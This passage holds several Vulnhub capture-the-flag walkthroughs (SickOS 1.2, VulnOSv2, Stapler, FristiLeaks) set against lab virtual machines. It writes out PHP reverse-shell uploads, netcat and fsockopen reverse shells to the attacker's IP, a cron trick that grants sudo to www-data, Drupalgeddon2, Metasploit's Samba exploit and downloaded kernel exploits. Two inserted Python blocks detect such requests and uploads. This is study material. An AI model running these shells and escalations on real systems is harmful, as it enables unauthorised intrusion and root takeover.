|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

But there is a page at /test.

Let's use curl to check the allowed HTTP methods.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Let's try uploading a PHP shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Let's download this and PUT it on the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener on our machine:

nc -nlvp 5555

and upload it to the server:

curl --upload-file  shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access it on the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a firewall problem. Let's try port 443: edit the file and re-upload it to the target.

We got a connection from the server. Great.
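The three web weaknesses used in the PwnLab and SickOS writeups (php://filter and ../ values in the page parameter and the lang cookie, the PUT method on /test/, and the GIF87a-prefixed PHP upload) are all visible at the request boundary. As an added example, not from either walkthrough, the checks below flag each of them; the requests and upload bodies are constructed from what the text shows.

```python
"""Request-side checks for the web weaknesses used in the PwnLab and
SickOS writeups: php:// and ../ values in query parameters or cookies
(the ?page= and lang-cookie includes), HTTP methods a web root should
never accept (the PUT to /test/), and image uploads carrying PHP tags
behind a valid GIF header.

Added example, not part of the original walkthroughs; the requests and
upload bodies are constructed from what the text shows.
"""
from urllib.parse import parse_qsl, unquote, urlsplit

ALLOWED_METHODS = {"GET", "HEAD", "POST"}
WRAPPER_PREFIXES = ("php://",)  # php://filter is the wrapper used above
TRAVERSAL = ("../", "..\\")
IMAGE_MAGIC = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}
PHP_TAGS = (b"<?php", b"<?=")

def _normalise(value):
    """URL-decode twice and lowercase, so %252e%252e%252f reads as ../ too."""
    return unquote(unquote(value)).lower()

def classify_value(value):
    """Why a parameter or cookie value looks like an include attack, or None."""
    v = _normalise(value)
    if v.startswith(WRAPPER_PREFIXES):
        return "stream wrapper"
    if any(t in v for t in TRAVERSAL):
        return "directory traversal"
    return None

def parse_cookies(header):
    """Split a Cookie header into {name: value}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies

def inspect_request(method, target, headers):
    """Return [(where, why)] findings for one request; [] means nothing seen."""
    findings = []
    if method.upper() not in ALLOWED_METHODS:
        findings.append(("method", method.upper() + " to " + target + " not allowed"))
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        why = classify_value(value)
        if why:
            findings.append(("query:" + name, why))
    for name, value in parse_cookies(headers.get("Cookie", "")).items():
        why = classify_value(value)
        if why:
            findings.append(("cookie:" + name, why))
    return findings

def check_upload(content_type, data):
    """Reason to reject an image upload, or None if it passes.

    Matching the magic bytes is not enough on its own: PwnLab accepted the
    file because it began with GIF87a, and the PHP after the header still
    ran once the file was include()d via the lang cookie. Scan for PHP
    tags as well, and never let user input choose the include path.
    """
    magic = IMAGE_MAGIC.get(content_type)
    if magic is None:
        return "content type not allowed"
    if not data.startswith(magic):
        return "magic bytes do not match declared type"
    if any(tag in data for tag in PHP_TAGS):
        return "PHP tags embedded in image"
    return None

if __name__ == "__main__":
    # Constructed requests mirroring the walkthrough steps.
    samples = [
        ("GET", "/?page=php://filter/convert.base64-encode/resource=config", {}),
        ("GET", "/index.php",
         {"Cookie": "PHPSESSID=abc123; lang=../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif"}),
        ("PUT", "/test/shell.php", {}),
        ("GET", "/?page=login", {}),
    ]
    for method, target, headers in samples:
        print(method, target, inspect_request(method, target, headers) or "clean")
    print(check_upload("image/gif", b"GIF87a\n<?php echo 'hi'; ?>"))
```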

Let's now try to escalate privileges.

First get a TTY shell with the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

Let's have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job running chkrootkit, and there is a known vulnerability in chkrootkit:

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed as /tmp/update with root privileges.

Let's create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Our cron job runs daily, so we need to wait until the next time it runs. Use this command to check whether the file has been updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Let's find the flag.

SickOS 1.2 conquered! Next day, next machine!

VulnOSv2 Vulnhub Machine Walkthrough

Today, we are working on the VulnOSv2 machine from Vulnhub.

First let's find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine's IP.

Let's do a detailed scan now.

[email protected]:~# nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Let's visit the website running on the machine.

The site looks like it is running Drupal. Let's scan it with Droopescan:

droopescan scan drupal -u http://192.168.18.88/jabc

The Drupal version seems to be 7.22 – 7.26.

Let's look for vulnerabilities now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

It looks like it works on Drupal 7.x. Let's try it:

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Let's check the user.

Before privilege escalation, let's first get a proper shell through netcat.

Start a listener on Kali:

root@kali:~# nc -nlvp 7777

and connect from the victim machine:

nc -e /bin/sh 192.168.18.87 7777

Done.

Time for Privilege Escalation

Let's get the OS information:

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Let's try the first one, the Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to the machine:

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile it:

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure the exploit binary is there, then enter ./exploit to run it.

And… we are root!

Let's find the flag:

cd /root
cat flag.txt

Let's do another machine tomorrow!

Stapler: 1 Vulnhub Machine Walkthrough

Let's find the IP first with nmap:

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Let's run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                    
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds

I didn't find anything interesting on the port 80 web page or in the nikto and gobuster scans.

Samba is running on port 139. Let's try to exploit it before moving on to FTP.

msfconsole
msf5 > use exploit/linux/samba/is_known_pipename

Now set the options.

Time to run the exploit. Enter run.

We got root. Now let's read the flag:

cat /root/flag.txt

Finished! That's all for today.

FristiLeaks: 1.3 Vulnhub Walkthrough

Hi! Let's see how we rooted FristiLeaks by Ar0xA from Vulnhub.

First find the IP and do a port scan.

We have only one port open. Let's scan it using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing interesting, right?

We need to find something else. Have a look at the following address.

http://192.168.18.80/fristi/

A login page, right?

Let's try breaking it. SQL injection didn't work, so there must be some other way. Let's have a look at the source code.

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

Need to look more 🙂 Scroll down to the end: there is a second HTML comment holding a long base64 blob.


Looks like this is base64 encoded. Let's try decoding it.

Visit https://www.base64decode.org/ to decode it.

It looks like a PNG image. Let's try decoding it as an image here: https://base64.guru/converter/decode/image/png

We got an Image.

Hopefully this is the password. But what about the username? admin? fristi?

They didn't work. Let's try eezeepz.

Yes, we are logged in now. There is a file upload form here, but it accepts only images.

We need to upload a PHP shell as an image here.

I used this shell:

https://github.com/melbinkm/PHPImageShell

Rename the file to shell.php.gif and upload it.

Fire up Burp Suite and catch the upload request.

Edit the filename in the request to shell.php.gif and send it.

We will get a response saying it was uploaded to the uploads directory. Now head to /uploads/shell.php.gif.

Now we can set up a listener on our Kali machine and connect from this shell.
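The two findings above suggest the checks a defender would want: spot long base64 runs hidden in HTML comments (and see what they decode to, a PNG here), and accept an upload only when its magic bytes match an allowed image type and the name carries no extra extension such as .php. This is an added example, not code from the original walkthrough or from the PHPImageShell project; the sample HTML and PNG header are constructed inline.

```python
# Added example, not part of the original walkthrough. Two defensive checks
# from this box: find base64 blobs hidden in HTML comments and identify what
# they decode to, and accept an upload only when its magic bytes match an
# allowed image type and the name carries no extra extension such as .php.
import base64
import binascii
import re

MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif",
         b"GIF89a": "gif", b"\xff\xd8\xff": "jpeg"}
_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
_B64_RE = re.compile(r"[A-Za-z0-9+/=\s]{40,}")  # long base64-looking runs

def sniff(data):
    """Image type from the leading bytes, or None if no known signature."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None

def hidden_blobs_in_comments(html):
    """(decoded_bytes, image_type) for each base64 run inside an HTML comment."""
    found = []
    for body in _COMMENT_RE.findall(html):
        for blob in _B64_RE.findall(body):
            compact = "".join(blob.split())
            if len(compact) < 40:
                continue
            try:
                raw = base64.b64decode(compact, validate=True)
            except binascii.Error:
                continue  # just prose or a malformed run
            found.append((raw, sniff(raw)))
    return found

def upload_allowed(filename, data):
    """Reject double extensions and bytes that are not the image the name claims.
    Magic bytes alone do not stop GIF/PHP polyglots, so uploads must also be
    stored outside the web root or served without script execution."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ("png", "gif", "jpg", "jpeg"):
        return False  # shell.php.gif splits into three parts -> rejected
    kind = sniff(data)
    return kind is not None and (kind == parts[1] or {kind, parts[1]} <= {"jpg", "jpeg"})

# Constructed sample: a page with a comment hiding a base64 PNG, as on the login page.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
SAMPLE_HTML = ("<html><!-- TODO: clean up --><body></body>\n<!--\n"
               + base64.b64encode(PNG_BYTES).decode() + "\n--></html>")
```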

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now it's time for privilege escalation. Use the command uname -a to find the OS version.

Let's search for an exploit.

What about using this?

https://www.exploit-db.com/exploits/40839

Let's try it.

Let's download the file using wget.

Time to compile and run the exploit.

Done! We now have a new user firefart with password pass.

Let's see if it is present in /etc/passwd.

Yes, it's there at the top. Now let's switch to our new account and check our root access.

Yes! We are root now. What about the flag?

That's all. It took me a little more time to find the fristi directory, but the privilege escalation part was quick.